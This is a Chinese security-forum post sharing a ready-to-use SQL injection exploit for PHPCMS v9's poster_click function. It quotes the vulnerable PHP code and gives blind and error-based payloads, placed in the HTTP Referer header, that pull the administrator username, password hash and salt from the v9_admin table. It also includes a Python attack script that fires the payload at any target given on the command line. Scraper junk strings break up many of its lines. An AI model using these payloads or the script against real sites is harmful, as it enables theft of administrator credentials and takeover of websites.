中国网络渗透测试联盟

标题: phpcms post_click注入0day利用代码 [打印本页]

---

作者: admin    时间: 2013-1-11 21:01
标题: phpcms post_click注入0day利用代码
有人放出了phpcmsv9的0day,就随时写了个利用代码,其中注入代码有两种形式:

问题函数\phpcms\modules\poster\index.php
/ G6 w6 [$ T6 V. l  Z
public function poster_click() {
! e2 e( x1 R; ^" L$id = isset($_GET['id']) ? intval($_GET['id']) : 0;
7 a+ w* q0 D/ }  I" ]4 E$r = $this->db->get_one(array('id'=>$id));
/ X+ W: L# o% m1 L0 s6 q/ a7 nif (!is_array($r) && empty($r)) return false;
$ip_area = pc_base::load_sys_class('ip_area');
2 i9 m, d8 e) R+ w( l' {$ip = ip();
& _6 o' ]# L% ~) F$area = $ip_area->get($ip);
  Q8 U; L8 d1 s6 w! G  [$username = param::get_cookie('username') ? param::get_cookie('username') : '';
if($id) {
$ Y2 I( `  E, O4 F$siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();
$this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1));
}
$this->db->update(array('clicks'=>'+=1'), array('id'=>$id));
# L& \+ o1 Z" T: s- n1 Z$setting = string2array($r['setting']);
7 A5 }) k% t8 V% \! M& Vif (count($setting)==1) {
7 c# g' r3 E" C# f8 [0 E0 o5 {+ n$url = $setting['1']['linkurl'];
} else {
5 P* {  O6 _6 ]% y0 x$url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl'];
4 V1 H/ p- i$ K/ J6 i0 @}
header('Location: '.$url);
}
+ x0 @  m6 d$ Q7 L; L
4 s; {5 `5 e. ?' K/ J

利用方式：

9 |6 f# F# T4 v" \% o6 A1 r1、可以采用盲注入的手法：
; p" ]7 X# }6 v! n
6 T7 ?% u! Y/ u8 Wreferer:1′,(select password from v9_admin where userid=1 substr(password,4)=’xxoo’),’1′)#

通过返回页面，正常与否一个个猜解密码字段。

2、代码是花开写的，随手附上了：

1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#
5 F. Z  D; ~: u- B5 o/ c5 u2 X5 x# J
此方法是爆错注入手法，原理自查。



' w# _0 _# j; v' |) J利用程序:

#!/usr/bin/env python
import httplib,sys,re
) l% X; f- k  ~: c5 _
def attack():
; E0 @0 R$ e* B# ]& S0 b) Gprint “Code by Pax.Mac Team conqu3r!”
print “Welcome to our zone!!!”
4 a5 H9 h% u4 A- r3 M; s  I+ yurl=sys.argv[1]
paths=sys.argv[2]
) y. Y2 d5 P1 a4 u! Kconn = httplib.HTTPConnection(url)
/ O% T+ d' d3 L! Li_headers = {“User-Agent”: “Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5″,
“Accept”: “text/plain”,
. \# I" }- c+ Y5 X6 v* K“Referer”: “1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#”}
2 \9 }% T" A- l6 W. Lconn.request(“GET”, paths+”/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2″, headers = i_headers)
- H9 j0 q: t0 q& `. Wr1 = conn.getresponse()
1 N( ~6 y: Z, Y* _$ [- E3 adatas=r1.read()
3 a! o5 t/ m* s3 D7 p+ ndatas=re.findall(r”Duplicate entry \’\w+’”, datas)
print datas[0]
* H2 q( Y2 @+ g# fconn.close()
if __name__==”__main__”:
if len(sys.argv)<3:
print “Code by Pax.Mac Team conqu3r”
print “Usgae:”
; b% H% W3 x& ^! C$ `" q* r3 vprint “    phpcmsattack.py   www.paxmac.org /”
" W) X1 j2 W* m! y1 _3 Kprint “    phpcmsataack.py   www.paxmac.org /phpcmsv9/”
  d; o1 C: T$ k5 z% ]4 isys.exit(1)
$ H) T4 M2 s: d$ m' D. h) tattack()

---

欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)

Powered by Discuz! X3.2